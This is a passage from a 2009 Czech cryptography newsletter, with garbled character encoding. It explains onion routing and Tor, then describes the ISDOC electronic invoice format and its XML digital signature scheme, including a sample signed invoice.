Ciacutelem metody je anonymniacute provoz v IP siacutetiacutech diacuteky tzv onion routerům Technika využiacutevaacute současnou infrastrukturu je tedy ihned použitelnaacute po nainstalovaacuteniacute přiacuteslušneacuteho software Zaacutekladniacutemi prvky jsou klient (Alice) onion routery a server (Bob) ke ktereacutemu Alice požadavek vysiacutelaacute Z odchycenyacutech dat neniacute možneacute vysledovat ani obsah komunikace ani jejiacute uacutečastniacuteky Každyacute prvek kteryacute se komunikace uacutečastniacute (onion router) znaacute pouze předchoziacute

Crypto-World 62009

9

prvek a naacutesledujiacuteciacute v cestě žaacutednyacute jinyacute Pouze posledniacute onion router v řetězci tzv gateway data rozšifruje vyšle požadavek na server Boba v internetu a obdržiacute odpověď Tato odpověď se zase zašifruje a vraciacute se přes onion routery zpět k původci komunikace Situace je znaacutezorněna pomociacute Obr č 2

Obr č 2 Struktura onion routing

Bezpečnost tohoto řešeniacute a anonymita Alice je založena praacutevě na routerech Ty si předaacutevajiacute data mezi sebou a znajiacute praacutevě jen předchůdce a naacutesledovniacuteka Jelikož je cesta přes routery vždy naacutehodně zvolenaacute a unikaacutetniacute neniacute možneacute zjistit Alici Jedinyacute kdo s niacute přiacutemo komunikuje je prvniacute router nicmeacuteně Alice se chovaacute z jeho pohledu jako běžnyacute router kteryacute provoz takeacute jen přeposiacutelaacute a negeneruje tudiacutež ani prvniacute router neznaacute původce dat Celyacute provoz vyslaacuteniacute požadavku od Alice k Bobovi tedy probiacutehaacute naacutesledovně

1 Všechny prvky v siacuteti vlastniacute soukromyacute a veřejnyacute kliacuteč asymetrickeacute kryptografie 2 V prvniacutem kroku si klient zvoliacute routery přes ktereacute půjde provoz Na jejich počtu zaacutevisiacute

bezpečnost a anonymita ndash čiacutem viacutece tiacutem je menšiacute možnost vysledovaacuteniacute Tato cesta musiacute byacutet naacutehodnaacute Klient znaacute veřejneacute kliacuteče těchto routerů

3 Klient zašifruje svůj požadavek dle naacutesledujiacuteciacuteho postupu )))((( požadavekEhlavEhlavEData

CBA VKVKVK ++=

4 Tedy vezme data pro Boba a zašifruje je pomociacute veřejneacuteho kliacuteče posledniacuteho routeru C (gateway) K vyacutesledku pak připojiacute IP hlavičku s adresou routeru C a znovu zašifruje pomociacute VK předchoziacuteho routeru B Tento proces se opakuje až k prvniacutemu routeru A

5 Tyto data pak odešle routeru A a tvaacuteřiacute se jako běžnyacute router tj že data pouze přeposiacutelaacute Router pomociacute sveacuteho soukromeacuteho kliacuteče rozšifruje kryptogram a zjistiacute hlavičku IP paketu v němž je uložena IP dalšiacuteho routeru a kryptogram zašifrovanyacute veřejnyacutem kliacutečem tohoto routeru Odešle tedy tyto data routeru B Takto postupujeme až k posledniacutemu routeru Jak je vidět žaacutednyacute router se nedozviacute viacutece než IP dalšiacuteho routeru (popř předchoziacuteho kteryacute data zaslal) a zašifrovanaacute data

6 Jakmile doraziacute data k posledniacutemu routeru C mohou byacutet rozšifrovaacutena a ziacuteskaacute se tak požadavek Ten je routerem vyslaacuten do internetu a je ziacuteskaacutena odpověď Odpověď je poslaacutena zpět stejnyacutem kanaacutelem Metoda daacutele přidaacutevaacute dalšiacute bezpečnostniacute techniky napřiacuteklad routery vklaacutedajiacuteciacute naacutehodneacute zpožděniacute do komunikace (aby nebylo možneacute sledovat tok dat dle časovaacuteniacute) či vklaacutedajiacuteciacute nesmyslnaacute data

TOR Vyacuteše zmiacuteněnyacute postup je zaacutekladem onion routingu tedy vytvaacuteřiacute se vrstvy do nichž

jsou vždy šifrovaacuteny informace o dalšiacutem bodě Nejznaacutemějšiacute implementaciacute tohoto postupu je TOR což je projekt The Onion Routing [7] Zde je postup jemně odlišnyacute Vytvořiacute se

Crypto-World 62009

10

symetrickeacute kliacuteče pro každyacute autentizovanyacute router pomociacute Diffie-Hellmanova algoritmu [8] a PKI [9] ktereacute se daacutele využiacutevajiacute k šifrovaacuteniacute zpraacutev (z důvodu rychlosti) Alice pak zpraacutevu zašifruje postupně všemi symetrickyacutemi kliacuteči ve stejneacutem duchu jako v předchoziacutem přiacutepadě viz Obr č 3

Obr č 3 Dopřednyacute směr v TOR

Zpraacuteva je pak doručena bezpečně až Bobovi Ten může vytvořit odpověď a poslat ji zpětnou cestou kde každyacute router zpraacutevu zašifruje svyacutem symetrickyacutem kliacutečem přidaacute tedy dalšiacute vrstvu Až doraziacute zpraacuteva k Alici může byacutet rozšifrovaacutena jelikož Alice všechny symetrickeacute kliacuteče znaacute Situace je znaacutezorněna na Obr č 4

Obr č 4 Odpověď v TOR

Obr č 5 TOR ndash přenos zpraacutev

Crypto-World 62009

11

Vyacutesledkem je praktickaacute implementace kteraacute naacutem dovoliacute komunikovat v IP siacutetiacutech zcela

anonymně i přes nutnost použiacutevaacuteniacute IP adres Zjednodušenyacute proces vytvořeniacute kanaacutelu je takeacute na Obr č 5 Zaacutevěr

Hlavniacutem ciacutelem tohoto člaacutenku bylo uvedeniacute důvodů pro zvyacutešeniacute anonymity v prostřediacute globaacutelniacute siacutetě a uvedeniacute řešeniacute ktereacute může sloužit jako počaacutetečniacute bod Byl zde stručně popsaacuten princip tzv onion routingu a nejpoužiacutevanějšiacute implementace TOR Na zaacutekladě těchto naacutestrojů je již možneacute zajistit anonymniacute komunikaci mezi dvěma prvky využiacutevajiacuteciacute IP siacutetě přičemž data budou mezi prvky vyměněna ale pro všechny uacutečastniacuteky zůstane identita klienta skryta Tyto naacutestroje bude daacutele možneacute využiacutet v dalšiacutech metodaacutech vyššiacute vrstvy napřiacuteklad u protokolů majiacuteciacutech zajistit anonymniacute autentizaci Literatura

[1] SCHNEIER Bruce The Tech Lab Bruce Schneier [online] 2009 [cit 2009-04-26] Dostupnyacute z WWW lthttpnewsbbccouk1hitechnology7897892stmgt

[2] FactCheck how many CCTV cameras [online] 2008 [cit 2009-04-26] Dostupnyacute z WWW lthttpwwwchannel4comnewsarticlessocietyfactcheck+how+many+cctv+cameras2291167gt

[3] SCHNEIER Bruce CCTV doesnt keep us safe yet the cameras are everywhere [online]

2008 [cit 2009-04-26] Dostupnyacute z WWW lthttpwwwguardiancouktechnology2008jun26politicsukcrimegt

[4] SCHNEIER Bruce Our Data Ourselves [online] 2008 [cit 2009-04-26] Dostupnyacute z WWW lthttpwwwwiredcomprintpoliticssecuritycommentarysecuritymatters200805securitymatters_0515gt

[5] Onion routing [online] 2009 [cit 2009-04-26] Dostupnyacute z WWW lthttpenwikipediaorgwikiOnion_routinggt

[6] Tor anonymity online [online] 2009 [cit 2009-04-26] Dostupnyacute z WWW lthttpwwwtorprojectorggt

[7] DIFFIE Whitfield HELLMAN Martin New Directions in Cryptography [online] 1976 [cit 2009-04-26] Dostupnyacute z WWW lthttpwwwcsrutgersedu~tdnguyenclassescs671presentationsArvind-NEWDIRSpdfgt

[8] PKI [online] - [cit 2009-04-26] Dostupnyacute z WWW lthttpcswikipediaorgwikiPKIgt

Crypto-World 62009

12

C Formaacutet elektronickeacute fakturace ISDOC Petr Kuchař ABRA Software as (petrkucharabraeu ) sdruženiacute SPIS (petrkucharspiscz) Preambule S narůstajiacuteciacutem použiacutevaacuteniacutem ICT technologiiacute ve všech oborech lidskeacute činnosti je v posledniacutem obdobiacute pozorovatelnyacute trend většiacuteho použiacutevaacuteniacute elektronickyacutech dokumentů a jejich vyacuteměny mezi subjekty ve smyslu nahrazeniacute klasickyacutech papiacuterovyacutech postupů elektronickyacutemi V tomto duchu jde i legislativa v ČR kteraacute od roku 2000 znaacute elektronickyacute podpis od roku 2005 majiacute elektronickeacute daňoveacute doklady stejnou vaacutehu jako papiacuteroveacute a od 72009 bude možneacute autorizovaně konvertovat papiacuteroveacute dokumenty na elektronickeacute a naopak a takeacute komunikovat se staacutetem či dalšiacutemi subjekty elektronicky prostřednictviacutem tzv Datoveacute schraacutenky Vrcholem trendu elektronizace ve veřejneacute spraacutevě je pak systeacutem zaacutekladniacutech registrů schvaacutelenyacute Poslaneckou sněmovnou 1322009 kteryacute posune eGovernment v Českeacute republice po mnoha letech na zcela novou informatickou uacuteroveň Vedle přiacutekladů z veřejneacute spraacutevy je stejnyacute trend pozorovatelnyacute i ve sfeacuteře korporaacutetniacute Jedniacutem z milniacuteků je vybudovaacuteniacute formaacutetu elektronickeacute fakturace s naacutezvem ISDOC Tento formaacutet byl vystavěn Pracovniacute skupinou pro elektronickou fakturaci sdruženiacute SPIS a maacute šanci staacutet se de facto standardem elektronickeacute fakturace v ČR V řiacutejnu 2008 se 14 vyacuteznamnyacutech firem z oboru ICT rozhodlo k podpisu bdquoDeklarace o společneacutem postupu v oblasti elektronickeacute fakturaceldquo kterou se tyto subjekty zavaacutezaly formaacutet implementovat do svyacutech fakturačniacutech produktů v obdobiacute jednoho roku od jeho vyhlaacutešeniacute ke ktereacutemu došlo 1932009 Naacutesledujiacuteciacute přiacutespěvek se věnuje vysvětleniacute důvodů jeho existence technologickyacutech vyacutechodisek použityacutech při jeho naacutevrhu včetně řešeniacute problematiky elektronickeacuteho podpisu a takeacute jednomu z naacutestrojů pro jeho hromadneacute nasazeniacute

Co je formaacutet ISDOC Formaacutet ISDOC je formaacutet elektronickeacute fakturace definovanyacute jako XML soubor a popsanyacute XSD scheacutematem Součaacutestiacute formaacutetu je i zaručenyacute elektronickyacute podpis založenyacute na kvalifikovaneacutem certifikaacutetu čiacutemž se takovyacute dokument staacutevaacute daňovyacutem dokladem vystavenyacutem v elektronickeacute formě podle sect 26 odst4 zaacutekona č2352004 o dani z přidaneacute hodnoty

Hlavniacute myšlenkou formaacutetu ISDOC je umožnit korporaacutetniacutemu i veřejneacutemu sektoru posiacutelaacuteniacute datovyacutech zpraacutev jejichž interniacute formaacutet bude v souladu s našiacute legislativou bude podporovaacuten vyacuteznamnyacutemi vyacuterobci fakturačniacuteho software v ČR a hlavně bude jednotnyacute Změniacute tak leacuteta trvajiacuteciacute žalostnyacute stav informačniacute praxe v našiacute zemi kdy ač technologie i legislativa elektronickou fakturaci dovolovala se tato diacuteky existenci mnoha proprietaacuterniacutech formaacutetů různyacutech vyacuterobců nedala použiacutet v globaacutelniacutem měřiacutetku Tak v roce 2006 vznikla z iniciativy ABRA Software as ve sdruženiacute SPIS pracovniacute skupina kteraacute navaacutezala na legislativniacute rešerše svyacutech předchůdců z roku 2003 a začala hledat konkreacutetniacute legislativniacute i technologickou cestu Zaklaacutedajiacuteciacute členoveacute skupiny ABRA Software LCS International a Ernst amp Young se zaacutehy rozrostli o dalšiacute firmy jako jsou Ciacutegler Software K2Atmitec Stormware DC Concept JKR nebo Českaacute spořitelna Pozornyacute čtenaacuteř již jistě postřehl že jde většinou o konkurenty na trhu informačniacutech a ERP systeacutemů Ano je tomu tak nicmeacuteně myšlenka jednotneacuteho formaacutetu je natolik silnaacute že i firmy v přiacutemeacutem konkurenčniacutem postaveniacute jsou schopny si sednout k jednomu stolu a spolupracovat na společneacutem diacutele Kliacutečovou uacutelohu v tomto ohledu sehraacutelo Sdruženiacute pro informačniacute společnost (SPIS)

Crypto-World 62009

13

Proč ISDOC vznikl a jakyacute je jeho ciacutel Bliacutezkyacutem ciacutelem vzniku formaacutetu bylo sjednotit elektronickou podobu několika ekonomickyacutech dokumentů fakturačniacute povahy (faktura dobropis vrubopis zaacutelohovaacute faktura daňovyacute zaacutelohovyacute list a jeho dobropis) a daacutet jiacute prostřednictviacutem spolupraacutece a podpory vyacuteznamnyacutech vyacuterobců na trhu k dispozici jejich klientům - firmaacutem ktereacute se zabyacutevajiacute obchodem či službami a ktereacute z nejrůznějšiacutech důvodů neimplementovaly žaacutedneacute jineacute obecneacute řešeniacute Vzdaacutelenyacutem ciacutelem pak je dosaacutehnout tiacutemto způsobem zvyacutešeniacute produktivity praacutece v segmentu vyacuteroby a distribuce zbožiacute i v segmentu služeb což v dlouhodobeacutem horizontu pomůže Českeacute republice jako celku se prosadit v evropskeacutem kontextu jako země s velkyacutem podiacutelem služeb s vysokou přidanou hodnotou Tiacutem aktivita ISDOC plniacute i jedno ze zaacutekladniacutech poslaacuteniacute sdruženiacute SPIS

Hlavniacute vyacutehody ISDOC Nevyžaduje pro komunikaci žaacutedneacuteho zprostředkovatele

Jedna z hlavniacutech vyacutehod tohoto formaacutetu XML soubor obsahuje elektronickyacute podpis a je tudiacutež plnohodnotnyacutem daňovyacutem dokladem V tomto smyslu neniacute podstatneacute jakaacute přenosovaacute infrastruktura je použita a jak došlo k doručeniacute dokladu od vystavitele k přiacutejemci Je možneacute tyto soubory posiacutelat jako přiacutelohu v běžneacutem e-mailu je možneacute použiacutevat zabezpečenyacute přenos pomociacute VPN či dalšiacutech řešeniacute (jako např bdquoNESS Trade Connectorldquo což je zabezpečenyacute přenos na uacuterovni B2B) nebo je možneacute soubory dopravovat na fyzickyacutech meacutediiacutech typu Flash či dokonce FD Důsledkem teacuteto vyacutehody je samozřejmě uacutespora transakčniacutech naacutekladů ktereacute např malyacutem firmaacutem doposud braacutenily takoveacute řešeniacute nasadit Tato vlastnost byla jedniacutem ze zaacutekladniacutech požadavků celeacuteho zadaacuteniacute formaacutetu ISDOC

Připouštiacute možnost zprostředkovatele komunikace

I když si tento bod možnaacute zdaacutenlivě odporuje s bodem předchoziacutem je takeacute důležityacute Formaacutet totiž připouštiacute i možnost třetiacute strany - zprostředkovatele komunikace mezi vyacutestavcem a přiacutejemcem kterou podporuje zvlaacuteštniacutemi bdquoroutovaciacutemildquo položkami Třetiacute strana do původně bilateraacutelniacuteho vztahu přinaacutešiacute zpravidla nějakou dalšiacute přidanou hodnotu za kterou jsou původniacute strany ochotny zaplatit Jedna z nejzajiacutemavějšiacutech je vyřešeniacute bezpečnostniacute problematiky jednotlivyacutech dokladů tak aby je cestou nemohl nikdo monitorovat daacutele to byacutevaacute notifikace přijetiacute dokladu zprostředkovatelem i přiacutejemcem vyřešeniacute souhlasu s přiacutejmem elektronickyacutech dokladů pomociacute všeobecnyacutech podmiacutenek zprostředkovatele a v neposledniacute řadě takeacute častaacute služba spočiacutevajiacuteciacute v archivaci jednotlivyacutech dokladů po zaacutekonnou dobu 10+1 let Přiacutekladem takoveacuteho řešeniacute může byacutet např Českaacute Spořitelna se svou službou FAKTURA 24 či již vyacuteše zmiacuteněnyacute systeacutem Datovyacutech schraacutenek kteryacute nabiacutedne oproti jinyacutem zaacutekonnou fikci doručeniacute dokumentu ve lhůtě 10 dnů Důsledkem možnosti využiacutet služeb intermediaacutetora nad formaacutetem ISDOC je možnost použitiacute stejneacuteho formaacutetu i pro relativně velkeacute subjekty jako jsou napřiacuteklad dodavateleacute ze segmentu utilit (tj energie vodaacuterenstviacute atd)

Formaacutet je pouze jeden

Pro pochopeniacute vyacuteznamu tohoto bodu je užitečneacute se podiacutevat do světa EDI (myšleno UN EDIFACT) což je dalšiacute formaacutet kteryacute naacuteš zaacutekon o DPH pro elektronickeacute daňoveacute doklady připouštiacute Definuje jej odkazem na bdquoDoporučeniacute komise 1994820ES ze dne 19řiacutejna 1994ldquo Zde je situace takovaacute že jednotliviacute dodavateleacute EDI řešeniacute často oborově zaměřeniacute si mohou z mnoha standardniacutech položek formaacutetu vybrat pro sveacute použitiacute pouze některeacute a na těch vystavět svůj tzv subset Vyacutesledkem je že firma kteraacute maacute ve sveacutem ISERP implemenovaacuten subset A přiacutemo nemůže komunikovat s firmou majiacuteciacute implementovaacuten subset B Musiacute z principu využiacutet služeb třetiacute strany kteraacute umiacute převeacutest protokoly jednotlivyacutech subsetů mezi

Crypto-World 62009

14

sebou což typicky byacutevaacute placenaacute služba Naproti tomu u formaacutetu ISDOC nic takoveacuteho neniacute třeba protože formaacutet je prostě jen jeden Samozřejmě je třeba se popasovat s probleacutemem oborovyacutech specifik kteryacute je v ISDOC vyřešen pomociacute hlavičkovyacutech a řaacutedkovyacutech uživatelskyacutech položek To jsou elementy v jejichž raacutemci může byacutet umiacutestěna libovolnaacute uživatelskaacute XML struktura kteraacute na rozdiacutel od zbytku formaacutetu nepodleacutehaacute kontrole pomociacute XSD scheacutematu a tudiacutež neniacute třeba s každou takovou uživatelskou variantou měnit zaacutekladniacute XSD scheacutema

Obecně je možneacute řiacuteci že Pracovniacute skupina pracovala celyacutech 14 měsiacuteců na tom aby formaacutet zohlednil všechna důležitaacute specifika českeacute daňoveacute legislativy Našiacutem ciacutelem bylo aby formaacutet byl schopen nahradit 95 faktur ktereacute se doposud vyskytovaly v papiacuterovyacutech firemniacutech transakciacutech Důsledkem vyacuteše zmiacuteněnyacutech vlastnostiacute pak je že pokud libovolnaacute firma použiacutevaacute fakturačniacute software podporujiacuteciacute formaacutet ISDOC a elektronicky fakturuje tak libovolneacute jineacute firmy podporujiacuteciacute takteacutež formaacutet ISDOC mohou tyto faktury přijiacutemat a jejich systeacutem je umiacute interpretovat A pokud přijiacutemaciacute systeacutem objeviacute uživatelskeacute položky kteryacutem rozumiacute tak je použije pokud ne tak je ignoruje V každeacutem přiacutepadě je ale faktura načtena jak položkově tak finančně Aby pravděpodobnost spraacutevneacute interpretace byla co nejvyššiacute iniciovalo sdruženiacute SPIS již jmenovanou ldquoDeklaraci o společneacutem postupu v oblasti elektronickeacute fakturacerdquo na ktereacute se kromě již zmiacuteněnyacutech firem shodli i dalšiacute vyacuteznamneacute firmy z oboru ISERP jako jsou Karat Software Gordic Asseco ČR či dokonce zaacutestupci nadnaacuterodniacutech gigantů jako Microsoft nebo SAP ČR Po vyhlaacutešeniacute formaacutetu v březnu 2009 se k Deklaraci začaly připojovat dalšiacute firmy K 162009 je jejich vyacutečet naacutesledujiacuteciacute Accord ALTEC ALTUS software COMPEKON MICRODATA ORTEX TILL CONSULT TRIADA VERA a WinStrom

Z čeho jsme vychaacutezeli Formaacutet ISDOC vychaacuteziacute filozoficky z formaacutetu UBL 20 definovaneacuteho mezinaacuterodniacutem sdruženiacutem OASIS (wwwoasis-openorg) Z teacuteto normy jsme původně vyšli a chviacuteli se zdaacutelo že budeme moci jen popsat co ktereacute položky znamenajiacute a můžeme začiacutet implementovat do svyacutech systeacutemů Časem se ale začaly objevovat probleacutemy jak naplnit ten či onen legislativniacute požadavek a v určitou chviacuteli bylo jasneacute že budeme muset pro některeacute funkčnosti použiacutet vlastniacute položky protože UBL nic podobneacuteho neřešiacute (napřiacuteklad problematika daňovyacutech zaacuteloh počiacutetaacuteniacute DPH metodou zdola nebo shora atd) Tak se v naacutevrhu objevil kromě čtyř původniacutech jmennyacutech prostorů i jeden novyacute ndash bdquoisdldquo ve ktereacutem jsme koncentrovali veškereacute noveacute či pozměněneacute položky Když jsme začali daacutevat dohromady jednotlivaacute XML scheacutemata (soubory XSD) tak se velmi rychle ukaacutezalo že vyacuteslednyacute popis i formaacutet je složityacute a nepřehlednyacute A tak jsme nakonec definovali jedinyacute jmennyacute prostor kteryacute cca z 12 vychaacuteziacute z položek a datovyacutech typů UBL a ze druheacute poloviny je doplněn položkami vlastniacutemi Všechny položky majiacute samozřejmě anglickeacute naacutezvy a kde to bylo možneacute použili jsme datovyacute typ shodnyacute s UBL 20

Hlavniacute rysy technickeacuteho řešeniacute Viacutece druhů dokladů faktura čniacute povahy

Jak již bylo zmiacuteněno formaacutet ISDOC řešiacute všechny zaacutekladniacute dokumenty fakturačniacute povahy ktereacute se mohou vyskytovat v běžneacute firemniacute praxi Jednaacute se konkreacutetně o fakturu vč podpory zuacutečtovaacuteniacute daňovyacutech i přiacutepadnyacutech nedaňovyacutech zaacutelohovyacutech listů dobropis vrubopis zaacutelohovou fakturu (myšleno nedaňovyacute zaacutelohovyacute list) daňovyacute zaacutelohovyacute list a dobropis daňoveacuteho zaacutelohoveacuteho listu

Crypto-World 62009

15

Doklady v miacutestniacute i ciziacute měně

Všechny doklady mohou byacutet buď v miacutestniacute nebo v jedneacute ciziacute měně Tuto omezujiacuteciacute podmiacutenku jsme stanovili po analyacuteze vyacuteskytu cizoměnnyacutech dokladů s viacutece než jednou měnou Podle našich zjištěniacute je takovyacutech dokladů jen velmi maleacute množstviacute Z tohoto důvodu a současně takeacute z důvodu neuacuteměrneacuteho zkomplikovaacuteniacute vnitřniacutech vazeb jsme rozhodli se touto variantou nadaacutele nezabyacutevat Identifikace až 5-ti různyacutech stran na dokladu

Protože na dokladech se běžně vyskytujiacute kromě adres odběratele a dodavatele zapsanyacutech v obchodniacutem rejstřiacuteku ještě adresy dalšiacute např adresy fakturačniacutech miacutest či adresy dodaacuteniacute podporuje ISDOC až 5 takovyacutech Důležiteacute je to i proto že zaacutekon dovoluje pověřit fakturaciacute třetiacute osobu Důležiteacute je že rozlišovaciacute položky pro identifikaci firem dovolujiacute použitiacute jak firemniacutech (proprietaacuterniacutech) koacutedů tak celosvětovyacutech GLN (Global Location Number) identifikaacutetorů a samozřejmě takeacute naacuterodniacutech identifikačniacutech čiacutesel kteryacutem je v ČR uacutedaj IČ

Identifikace zbožiacute až 5-ti rozlišujiacuteciacutemi uacutedaji

Podobně jako v přiacutepadě firem je u rozlišeniacute zbožiacute podporovaacuteno hned několik druhů identifikaacutetorů Jsou to až 3 různeacute koacutedy podle dodavatele daacutele globaacutelniacute identifikaacutetor typu EAN a pro spolupraacutece typu bdquomalyacute dodavatel a obrovskyacute odběratelldquo i koacutedy zbožiacute podle odběratele

Podpora seacuteriovyacutech čiacutesel a šaržiacute vč expiraciacute

Protože předmětem obchodu a tedy i fakturace je často zbožiacute u ktereacuteho je třeba evidovat jednotlivaacute seacuteriovaacute čiacutesla (typicky velkaacute elektronika) nebo seacuterie zbožiacute se stejnou šaržiacute (typicky leacuteky či potraviny) obsahuje ISDOC přiacuteslušneacute kolekce i na tyto eventuality

Možnost použitiacute tzv uživatelskyacutech položek

Technicky se jednaacute o zvlaacuteštniacute nevalidovaneacute kolekce hlavičkovyacutech a řaacutedkovyacutech položek ktereacute nejsou zaacuteměrně nijak svaacutezaacuteny s hlavniacutem XSD scheacutematem Tiacutem je možno ve standardizovaneacutem formaacutetu použiacutevat i položky na kteryacutech se vyacutestavce a přiacutejemce dohodli bilateraacutelně Napřiacuteklad bude-li nutno na fakturačniacutem řaacutedku se spotřebou elektrickeacute energie v KWh přeneacutest ještě doplňkovou informaci v jakyacutech sazbaacutech se čerpaacuteniacute uskutečnilo jakyacute byl paušaacutelniacute poplatek za konkreacutetniacute elektroměr a nakolik zaacutekaniacutek využil možnost vyacutekupu zeleneacute energie tak je to touto cestou možneacute aniž je nutno měnit celkovou verzi formaacutetu a na všech stranaacutech jiacute implementovat V praxi tak informačniacute systeacutemy vyacutestavce a přiacutejemce mohou byacutet upraveny k použiacutevaacuteniacute těchto položek zatiacutemco ostatniacute systeacutemy tyto položky nebudou interpretovat protože tyto nejsou popsaacuteny ve validačniacutech scheacutematech Položky povinneacute pro daňovyacute doklad však obsahuje každyacute soubor ISDOC

Řešeniacute přiacuteloh jako dokumentů majiacuteciacutech praacutevniacute relevanci k faktuře

Protože v papiacuteroveacute praxi se často vyskytujiacute u faktur takeacute přiacutelohy ktereacute mohou miacutet i praacutevniacute relevanci k mateřskeacutemu dokladu museli jsme za viděniacute ciacutele nahradit papiacuteroveacute řešeniacute elektronickyacutem řešit i tyto situace Přiacutelohy mohou obsahovat napřiacuteklad všeobecneacute obchodniacute podmiacutenky přiacutelohou může byacutet kalkulačniacute list k faktuře na parkety stejně jako fotografie billboardu k faktuře na reklamniacute služby Řešeniacute se v zaacutesadě děliacute na ty ktereacute musiacute omezit velikost přiacuteloh a na ty ostatniacute kde to nutneacute neniacute K omezeniacute velikosti přiacuteloh se přistupuje v přiacutepadě kdy přiacutelohy jsou součaacutestiacute samotneacuteho XML (v přiacuteslušneacutem koacutedovaacuteniacute např BASE64) a jejich nadměrnaacute velikost by tak mohla zcela ochromit zachaacutezeniacute s přiacuteslušnyacutem souborem (funce načteniacute do paměti verifikace proti XSD atd) Proto jsme se v definici ISDOC vydali druhou cestou kterou je udržovaacuteniacute přiacuteloh mimo vlastniacute XML soubor ndash v jineacutem datoveacutem

Crypto-World 62009

16

kontejneru Formaacutet ISDOC jsou tedy ve skutečnosti formaacutety dva Jeden je soubor isdoc což je vnitřně bdquoklasickyacuteldquo XML soubor kteryacute neobsahuje žaacutedneacute přiacutelohy a použije se praacutevě v tomto přiacutepadě Druhyacutem formaacutetem je soubor isdocx kteryacute je vnitřně souborem typu ZIP a kteryacute může kromě bdquohlavniacuteholdquo souboru isdoc neacutest i libovolneacute dalšiacute soubory jako přiacutelohy daneacuteho dokladu Vtip je v tom že jednotliveacute přiacutelohy jsou referencovaacuteny v přiacuteslušneacute kolekci bdquohlavniacuteholdquo isdoc souboru svyacutem jmeacutenem a SHA1 otiskem A jak již bylo uvedeno celyacute obsah dokladu isdoc je podepsaacuten elpodpisem Tiacutem jsou soubory přiacuteloh sice technicky umiacutestěny vně XML (a nezdržujiacute jeho zpracovaacuteniacute) ale současně se jakaacutekoliv manipulace s přiacutelohami okamžitě projeviacute porušeniacutem SHA1 otisků jednotlivyacutech přiacuteloh přiacutepadně rovnou neplatnostiacute elektronickeacuteho podpisu celeacute faktury pokud by se někdo pokoušel v niacute SHA1 otisky přiacuteloh ručně přepsat Tiacutem by byl soubor isdoc prohlaacutešen za neautentickyacute (pozměněnyacute) Vyacutesledneacute řešeniacute tedy splňuje splňuje stejnaacute bezpečnostniacute kriteacuteria jako kdyby přiacutelohy byly celeacute součaacutestiacute jedineacuteho podepsaneacuteho XML

Vlastniacute implementace elektronickeacuteho podpisu Po provedeniacute rešerše technik podepisovaacuteniacute jsme pro přiacutepad podepisovaacuteniacute XML souboru isdoc zvolili normu XMLSig metodu Enveloped Jejiacutem principem je že těsně před ukončeniacutem rootoveacuteho elementu kteryacutem je v našem přiacutepadě element ltInvoicegt se vložiacute element ltSignaturegt ve ktereacutem se celyacute podpis odehraacutevaacute Uvnitř tohoto elementu jsou pak tři dalšiacute ltSignedInfogtltSignatureValuegtltKeyInfogt Element ltSignedInfogt obsahuje kromě popisu algoritmů digitaacutelniacuteho otisku algoritmů kanonikalizace a elektronickeacuteho podpisu hlavně vlastniacute digitaacutelniacute otisk celeacuteho XML dokumentu a to v elementu ltDigestValuegt Kanonikalizace je metoda kteraacute uvnitř struktury XML vyřadiacute přebytečneacute mezery viacutecenaacutesobneacute konce řaacutedků a dalšiacute neproduktivniacute znaky Pozor ale tato metoda nijak nemanipuluje s vlastniacutemi daty jednotlivyacutech elementů ktereacute i po kanonikalizaci zůstaacutevajiacute v původniacutem tvaru řešiacute pouze znaky ve struktuře XML Napřiacuteklad tedy pokud atribut nějakeacuteho elmentu je zbytečně posunut vpravo a podobně Po kanonikalizaci je proveden otisk přiacuteslušnyacutem algoritmem a pak je již programem složen celyacute element ltSignedInfogt Na tento element je naacutesledně aplikovaacuten elektronickyacute podpis zvolenou metodou v drtiveacute většině se použiacutevaacute algoritmus RSA a vyacutesledek je uložen do elementu ltSignatureValuegt Aby přiacutejemce měl vždy po ruce veřejnyacute kliacuteč podepisujiacuteciacute osoby je jako třetiacute element přidaacutena binaacuterniacute reprezentace jeho certifikaacutetu a to do jednoho z podelementů elementu ltKeyInfogt

Poznaacutemka od 112010 je podle světovyacutech doporučeniacute zapovězeno v systeacutemech veřejneacute spraacutevy v ČR použiacutevaacuteniacute digitaacutelniacutech otisků algoritmem SHA1 a je nutno přejiacutet na některyacute vyššiacute algoritmus z rodiny SHA2 napřiacuteklad SHA256 Pracovniacute skupina SPIS na tomto probleacutemu aktuaacutelně pracuje

Konkreacutetniacute provedeniacute podpisu v XML souboru faktury by mohlo po určiteacutem zjednodušeniacute a naformaacutetovaacuteniacute vypadat např takto

ltxml version=10 encoding=utf-8gt ltInvoice xmlns=httpisdoccznamespaceinvoice version=51gt lt--helliphelliphelliphelliphelliphellip--gt ltmdashpoložky dokumentu faktura--gt lt--helliphelliphelliphelliphelliphellip--gt ltPaymentMeansgt ltmdashposledni element nepodepsane faktury- --gt ltPaymentMeansgt

Crypto-World 62009

17

ltSignature xmlns=httpwwww3org200009xmldsi ggt ltSignedInfogt

ltCanonicalizationMethod Algorithm=httpwwww3or gTR2001REC-xml- c14n-20010315gt ltSignatureMethod Algorithm=httpwwww3org2000 09xmldsigrsa- sha1gt

ltReference URI=gt ltTransformsgt

ltTransform Algorithm=httpwwww3org200009xml dsigenveloped-signaturegt

ltTransformsgt ltDigestMethod Algorithm=httpwwww3org2000 09xmldsigsha1gt ltDigestValuegt29hg161shG5T0cuwyUEQZiHmn4=ltDiges tValuegt ltReferencegt ltSignedInfogt ltSignatureValuegtrJgOKTSyaGb5 atd==ltSignatureVa luegt ltKeyInfogt ltX509Datagt ltX509CertificategtMIIEVCCAz+gAKoZIhvcNAQAwaDELmak GA1UEBhMCQ1ox hellip vlastni klientskyacute certifikaacutet hellip qoF4Y1IgJ0w16ws= ltX509Certificategt ltX509Datagt ltKeyInfogt ltSignaturegt ltInvoicegt

Podpora formaacutetu v jednotlivyacutech ISERP V době psaniacute tohoto člaacutenku (červen 2009) ještě neniacute možneacute hodnotit uacuteroveň implementace v jednotlivyacutech IS protože většina vyacuterobců jiacute plaacutenuje až do podzimniacutech nebo zimniacutech legislativniacutech verziacute Nepochybně bude velmi zajiacutemaveacute porovnat jak jednotliviacute vyacuterobci k implementaci formaacutetu ISDOC ve svyacutech systeacutemech přistoupili Ať to ale provedou tak či onak důležiteacute je že fakturu nebude v systeacutemu přiacutejemce třeba znovu typovat a že položky budou automaticky (nebo alespoň poloautomaticky) rozeznaacuteny V tom se skryacutevaacute siacutela celeacuteho řešeniacute na straně přiacutejemce

